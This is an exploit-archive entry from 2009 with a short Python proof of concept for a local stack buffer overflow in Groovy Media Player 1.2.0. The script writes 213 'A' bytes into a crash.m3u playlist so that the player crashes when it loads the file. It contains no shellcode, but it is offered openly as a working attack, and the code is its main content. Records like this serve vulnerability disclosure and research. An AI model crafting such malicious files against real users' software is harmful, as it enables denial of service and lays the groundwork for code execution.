id: 6956
date: 08/05/2009
title: Groovy Media Player 1.2.0 (.m3u) Local Buffer Overflow PoC
author: opt!x hacker
cves: 

==========================================================
Groovy Media Player 1.2.0 (.m3u) Local Buffer Overflow PoC
==========================================================


#!/usr/bin/python
print "Groovy Media Player 1.2.0 (.m3u) local stack overlow POC"
print " finded by : opt!x hacker "
print "download: http://www.bestwebsharing.com/downloads/groovy-media-player-setup.exe "
junk = "\x41"*213
file=open("crash.m3u","w")
file.write(junk)
file.close()



#  0day.today [2023-03-22]  #